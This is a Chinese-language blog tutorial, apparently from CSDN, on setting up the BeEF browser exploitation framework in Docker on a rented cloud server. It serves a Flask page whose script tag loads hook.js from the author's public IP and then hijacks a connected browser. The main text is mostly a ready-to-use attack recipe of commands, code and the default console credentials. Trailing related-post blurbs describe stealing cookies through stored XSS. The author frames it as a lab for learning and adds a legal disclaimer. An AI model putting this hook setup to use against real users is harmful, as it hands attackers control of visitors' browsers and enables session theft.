beef-xss浏览器劫持

已于 2023-04-19 23:02:53 修改
阅读量1k 收藏 12
点赞数 1
分类专栏: 网络安全 文章标签: xss flask
于 2023-04-19 22:58:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43225966/article/details/130254859
版权
本文详细介绍了如何在阿里云Ubuntu服务器上通过Docker搭建Beef环境,并使用Python的Flask库启动HTTPweb服务,通过hook.js实现浏览器劫持。用户需注意,此类技术仅适用于合法的技术学习,不可用于非法活动。
摘要由CSDN通过智能技术生成

beef-xss浏览器劫持

一,实验拓扑图

请添加图片描述

二,租用一台阿里云,搭建docker环境和beef环境

1.租一台阿里云服务器,系统选用ubuntu,计时收费的那种,一个小时几毛钱
2.开启策略组3000端口,5000端口

在这里插入图片描述

4.安装docker
apt install docker.io
5.拉取beef镜像,并且运行容器
docker pull janes/beef
6.运行beef容器:
docker run -dp 3000:3000 janes/beef
打开浏览器 输入网址: http://8.218.50.45:3000/ui/panel 进入 beef控制台,用户名和密码都是 beef

三,使用python启动一个http web服务

1.beef.py 和templates 文件夹在同一级,beef.html在templates 文件夹下

在这里插入图片描述

在这里插入图片描述

beef.py

import os
from flask import Flask, request, render_template, redirect

app = Flask(__name__)

@app.route('/beef', methods=['POST', 'GET'])
def do_beef():

    return render_template('beef.html')

if __name__ == '__main__':
    app.run(host='0.0.0.0',debug=True)

beef.html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <script src="http://8.218.50.45:3000/hook.js"></script>
    <title>test</title>
  </head>
  <body>
    please wait ...
  </body>
</html>

其中<script src="http://8.218.50.45:3000/hook.js"></script> 是指向我们刚才搭建的beef平台

传到我们刚才租的那台阿里云服务器上如下:
在这里插入图片描述

2.安装 flask库并运行 beef.py:
pip3 install flask
python3 beef.py

在这里插入图片描述

3.本地打开浏览器访问页面 http://8.218.50.45:5000/beef,

在这里插入图片描述

4.观察beef控制台

在这里插入图片描述

四,对上线的受害主机浏览器进行劫持

1.执行创建对话框

在这里插入图片描述

2.本地浏览器出现弹窗在这里插入图片描述

五,免责声明

本教程只能用于技术学习,不得使用本教程从事任何违法犯罪行为。
研究猿小刘
关注
专栏目录
20-5 XSS的利用(包含:蓝莲花、beef-xss
weixin_43263566的博客
01-12 354
存储型XSS是一种特殊类型的XSS攻击。攻击者将带有XSS攻击代码的链接放在网页上的某个位置(例如评论框),当用户访问此链接并执行时,攻击者就能获取用户的敏感信息。由于存储型XSS能够攻击所有访问此页面的用户,因此其危害非常大。之后刷新网页或从其他菜单切换到当前url都会触发攻击,出现弹框。那知道了这个机制后我们就开始收集用户的cookie。
利用 BeEF 执行 XSS 攻击的总结
陌生人
05-27 1361
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
Docker的安装与使用
BeefpasteC的博客
06-28 621
Docker的安装与使用 1,安装docker ​ yum install docker -y 2,安装镜像 ​ /etc/docker/daemon.json Systemctl start docker ——》启动docker docker search image——》 搜索镜像 docker pull image——》 拉取镜像 docker images——》 查看所有的镜像...
XSS部分:利用Beef劫持被攻击者客户端浏览器
AZXYZNPY的博客
11-21 207
原理:此类XSS漏洞是指,用户输入的数据(恶意代码)可以“存储”在服务端,只要有人访问这个包含有存储型XSS代码的页面,XSS脚本就会在他们的浏览器中执行,这种XSS具有很强的稳定性。,截图。3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);被攻击者:访问留言簿网站,浏览器劫持
阿里云ubuntu16.04安装beef
04-07 464
0x0 前言 环境:阿里云轻量服务器ubuntu16.04 需要安装2.4以上版本的ruby:https://www.cnblogs.com/Rain99-/p/10666247.html 参考资料 A:https://www.cnblogs.com/heijuelou/p/7791689.html B:https://www.freebuf.com/articles/w...
Beef-Xss 浏览器攻击框架的使用
XXokok的博客
10-01 837
Beef-Xss 浏览器攻击框架的使用,如果导致目标引入了外部JS文件,则会沦为“肉鸡”
Beef-xss安装及使用
qq_40624810的博客
12-10 7642
一、背景 BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。 随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强化的网络边界和客户端系统,并在一个开放的环境中检查可利用性:Web浏览器BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击的滩头阵地。 BeEF
docker搭建xss平台
liguangyao213的博客
01-06 1485
下载xss_platform docker search xss xss平台没有统一的名称,只能按照xss关键词来进行搜索 定位到之后进行下载 docker pull wushangleon/xss_platform 启动docker,这里我用一个不常用的8001端口做映射 docker run -d --name=xss_platform -p 8001:80 wushangleon/xss_platform docker ps #查看已经启动 浏览器访问:http://ip:8001/ 配置
BeEF-XSS攻击
彭淦淦的博客
05-11 1011
6.1 问题 Kali虚拟机(192.168.111.132)搭建BeEF服务 宿主机(192.168.111.1)搭建正常网站 Win2008虚拟机(192.168.111.133)模拟用户被攻击 6.2 步骤 实现此案例需要按照如下步骤进行。 1)Kali虚拟机安装BeEF,依次运行命令apt-get update,apt-get install beef-xss,安装完成后启动beef-xss,用户名beef,自定义密码例如123456,如图-11和图-12所示 图-11 图-1
XSS自动化工具——Beef
世间繁华梦一出
03-10 5574
Beef的使用一、Beef简介二、beef的下载安装三、Beef配置四、Beef的使用五、Beef的主要功能 在我的记忆之中之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧 一、Beef简介 Browser Exploitation Framework (BeEFBeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透, BeEF 是基于Ruby语言编写的
XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS(网络安全学习13)
Until_U的博客
07-06 5810
CONTENTS 1 XSS简介 2 构造XSS脚本 2.1 常用的HTML标签 2.2 常用java script方法 2.3 构造XSS脚本 3 反射型XSS 4 存储型XSS 5 kali渗透获取cookie 6 自动化XSS 6.1 BEef简介 6.2 BEef的主要功能 6.3 BEef实战 1 XSS简介 (1)XSS相关概念 跨站脚本( cross site script )为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现...
xss跨站漏洞】xss漏洞利用工具beef的安装
2302_79590880的博客
02-22 827
xss工具beef的服务器安装
本地搭建beef_xss映射到公网
qq_41671415的博客
02-20 1606
前言:原本很简单的docker安装beef就完事l,结果垃圾阿里yum源居然不能构建缓存,网上的在线xss风险高的一批不敢用, 环境: 服务端:阿里云(centos8),frps 客户端:win 10 , frpc frp安装配置so easy,百度一大堆 docker安装beef so easy,百度一大堆 访问成功: 在这里插入图片描述 ...
XSS.基础
newlife1441的博客
07-26 1072
跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息,本文将介绍XSS的两种类型,反射型跨站脚本攻击、DOM型和存储型跨站脚本攻击的示例和基本原理;
乌班图安装beef
weixin_34402090的博客
08-29 142
2019独角兽企业重金招聘Python工程师标准>>> ...
Docker镜像创建
BeefpasteC的博客
06-28 802
Docker镜像创建 docker镜像添加: ​ docker pull 镜像名称 ​ docker run 镜像名称 docker镜像查看: ​ docker images docker镜像删除: ​ docker rmi 镜像id 或镜像名称 docker镜像创建: ​ 创建镜像,是在有基础镜像的前提下,开发者需要定义属于自己的独特的开发环境,比如在 centos7上安装pyth...
折腾beef记录
imtech的博客
09-07 552
beef
关于在ubuntu下安装beef的采坑之旅
12306小哥
11-03 3381
ubuntu下安装beef 生命不息,折腾不止 最近一直在忙其他的事情,kali过于臃肿,硬盘空间有限,折腾之心不死!所以自己给自己搞了个ubuntu虚拟机,打算把工具迁移过来。然而,关于beef在Ubuntu下安装网上的材料实在太少。很多教程现在已经不适用了。所以偷摸看了老外在油管上的教程,现在将整个安装过程简单说一下。 beef安装步骤 1、安装ruby #sudo apt inst...
ubuntu 安装 beef
tudoutest的博客
07-23 758
正常的安装流程 安装环境   vim /etc/apt/sources.list 添加 deb http://ubuntu.mirror.cambrium.nl/ubuntu/ precise main universe 添加软件源 apt-get install ruby1.9.3 apt-get install libssl-dev libsqlite3-dev...
云服务器上搭建beef-xss
最新发布
03-11
在云服务器上搭建beef-xss(Browser Exploitation Framework)可以用于进行Web浏览器漏洞利用和XSS攻击的测试和研究。下面是一些步骤来搭建beef-xss: 1. 选择云服务器:首先,你需要选择一个云服务器提供商,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值